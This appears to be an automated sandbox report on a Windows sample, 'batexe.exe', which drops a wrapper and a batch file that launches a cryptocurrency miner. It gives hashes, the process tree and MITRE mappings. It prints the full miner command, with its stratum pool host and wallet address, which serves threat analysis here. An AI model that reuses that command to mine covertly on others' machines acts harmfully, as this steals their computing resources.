73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
305s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
22/02/2024, 00:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1928	b2e.exe
4340	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4340	cpuminer-sse2.exe
4340	cpuminer-sse2.exe
4340	cpuminer-sse2.exe
4340	cpuminer-sse2.exe
4340	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4812-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4812 wrote to memory of 1928	4812	batexe.exe	75
PID 4812 wrote to memory of 1928	4812	batexe.exe	75
PID 4812 wrote to memory of 1928	4812	batexe.exe	75
PID 1928 wrote to memory of 4504	1928	b2e.exe	76
PID 1928 wrote to memory of 4504	1928	b2e.exe	76
PID 1928 wrote to memory of 4504	1928	b2e.exe	76
PID 4504 wrote to memory of 4340	4504	cmd.exe	79
PID 4504 wrote to memory of 4340	4504	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4812
- C:\Users\Admin\AppData\Local\Temp\53B.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\53B.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\53B.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A1D.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4504
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4340

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\53B.tmp\b2e.exe

Filesize
1.6MB

MD5
9e5a5d0dfeb986e2c48bf6826c1205ed

SHA1
cdfb4b962798d5221b608fdd503c763c4c4abddc

SHA256
68af1705e1e641869f66541077539458b4ce96fbc5c5c68707c34028c6104c0e

SHA512
ca75f49743c04735054d90744401786560fe6fe60986014cc9dca796759ffcd6fe1e7c5d4328374978afbd97e04a292c07b2626618ab8cce6c5085b0e23d251d

Download Submit
C:\Users\Admin\AppData\Local\Temp\53B.tmp\b2e.exe

Filesize
2.4MB

MD5
8799bfc4c282d0ae5d08d3e0b63e118e

SHA1
b129d90f8948be0bf17108fa091c09664b81cea6

SHA256
b5023305fcc91a4cb173e9cc4a87a78db17e33d487eae04520c5dc8911590b3f

SHA512
d957be230b92a83ad54eeaddf5f953daff81b5fa26b6a3dce465f30ef0a2c37735b87383738761e73176031e04bd4249ffe63a7e4bf862bf8199eb97192df8af

Download Submit
C:\Users\Admin\AppData\Local\Temp\A1D.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
670KB

MD5
501965f02744fcc11a6a814f7eb14a81

SHA1
e7ef74db6592838ce79a28c7742d2d25fc234503

SHA256
2728ae71ecaaacb309dd2f686c58e2d734009cb1e45541185994e3c90058a761

SHA512
0ea84bfe5a0f9eaa009c169ad5d8180459d5fcf4ec13df92b15e5ca73eb16c57528cd5f79e2ded2425002e665d17d5331e62b11dde7c5573f2277a3a56ce6b95

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
745KB

MD5
f5a6872a8c4152d6a183892735dccf6c

SHA1
5b422e92e63963d7e281932107761199270f9722

SHA256
7c54786ecb7c2783796b180d7d95b894958247e762740664689fe67625ca22b0

SHA512
712bff93ff5e88c7b3c6b85352353c2b68f0a5ab96601bea50370168086cb7b56f5aa75de448bb46f95de5fd0d4dbfe9b2a0bfc264d03567c6b165237e2f8da1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
539KB

MD5
74a9af92931d5ef404488b72d86a2467

SHA1
b48f9c1d7c218ec2c5b3827a66841480e0ff2612

SHA256
63bf3e5ad64a4f2ff07812f9af7b8f6db69beb1923ac11838ebf55b1e474c991

SHA512
4708f519ea0f2bcd32de22745df03a1c6fa955779d1bb90a02e8b0b6d162cb88083279ba1a79d3826b09d87f52022cbc9c2a3a57bec3ad1d87a8f711e7afbac1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
651KB

MD5
93204222b2c2a799277e47acc692f02d

SHA1
9b697282c1a79ec6b84aec1426bfed291fba4e4e

SHA256
fd5b3b4c364d2dbbacae4b8ae5a7f136e990ea8ee7d768a4bb8192ab2db46cee

SHA512
e46f66397ccb8d6ddbfcfd806f39c6bbdbb8b74d7675d12848ac6b6a3ec53c3d5000c1b3ca09cdf771b7c65d8a500548d096ec8080bf95fd1e164183538c659a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
679KB

MD5
bb953c60d941760ee2416f83331ad90a

SHA1
83eab4574942d0440967a9fb2adec5655c7e7827

SHA256
31aa1d633d624405fda6e3bea34f61d0788862b2c57edff669b061eef5ac0415

SHA512
289a53048f8e95402d1f22a6b75f7030f726fcc73def4d29c8f0e4492401ff6eb2b4c32c16fe0736f336eb2f274d93ac4aad7759a3f4cfbc2f3fdb780a2149f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
485KB

MD5
1aee7bae890a494f7c59aef07414dafb

SHA1
7455c4127d4b0831ea9b8ae14df769b97d60ca53

SHA256
2e68c5b3ca83aa9bfb66e2b95a6007299dea14267dfc2c101891e7c3e45bd65b

SHA512
a4fb6fe4e262478821a6246ede1c520ed286888804f2a0080f39e11f2e1b10676a11750bb09ca28b5ce6f7a77bc6190b0ec4384f490bf9bc9e33a13f198a6e1a

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
530KB

MD5
0e7f73ff9f9cd02cded6b5d96031bc03

SHA1
fb90848c5979f74536873a815cd67797817dc733

SHA256
5be997f03e93832db1e46d04a419af65608db24ec94fbb61cb2b2e1d48760e07

SHA512
143f693c6882dd3be92f848ebd45bbceab9bdca2241a701c0e1b49f3d7e6d98500f241b3c1b234f60143297bbffc49c5460251e36612034124b9b89c03457de5

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
633KB

MD5
a36713ff5b2213464f56198c23c91c39

SHA1
3bde2cc372ccd8899599bcb39866bd58afdb6256

SHA256
e4b123aa658e5eca0e26cd26738d7df18fc94cbf586e739562049dfe6bad6ae8

SHA512
8e09467d94fad54228e4fd77d5411531b237f41d554ef19b6785cd1d588d705b5ca5a14d768a04be847d401966bd70fee1007bb7a1655be01f49992d0cbeb828

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
631KB

MD5
06d735d292f55c2aac85a8593ae61fdf

SHA1
820e87f722e4aa5a08bf23d933faf1ea013f69da

SHA256
53e43f47459202bb3fd184fc1c24d020d61f387c6ef01219b8c38a7fb0872930

SHA512
17155ea5d870f8492ce8bca535c2ccb95c871a8d0c4a9d8432616d6e0ba3a17dabe8271ebee1af1e6437daff412d5c073777d76451a0201333d9a878fe9f7b56

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
390KB

MD5
07d5bd6f301b3087d0dc8ec391971f0e

SHA1
4be8862ff03e6939ff4c3503c3c3e1afbc9e6861

SHA256
48a4d24c84b6de1f7876631ef847e3c477f5b74b778dc4363ec272a1ef06f423

SHA512
f4a169253cc9a7ac4d821b6a05852f8cd49a67cbb4ce35f80d0683c3253f20c4a17e4a71e80e06093ac8d92e9256ea3b3505488989f36c94736f49ac6250bf7b

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
495KB

MD5
3946b54adbf22f8b1df351af24af04e8

SHA1
32043cc0401ab017d7726338e9905a9e6b46e65f

SHA256
cca3df2c2fbd702db583ff0fa9e129535ddaca8eb9644025bb6611a33aa65f0f

SHA512
bb0271c3fd071137a8858b68c9557a93ea2e34ebcc5d4f721e3af4aad6044ffcb66b23257a9e14828dda60707f47c2fca6d75f7deacc823e9a14e280017ccf67

Download Submit
memory/1928-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1928-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4340-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4340-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4340-43-0x0000000052D70000-0x0000000052E08000-memory.dmp

Filesize
608KB

Download
memory/4340-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4340-44-0x0000000001150000-0x0000000002A05000-memory.dmp

Filesize
24.7MB

Download
memory/4340-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4340-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4340-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4340-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4340-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4340-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4340-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4340-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4340-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4812-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download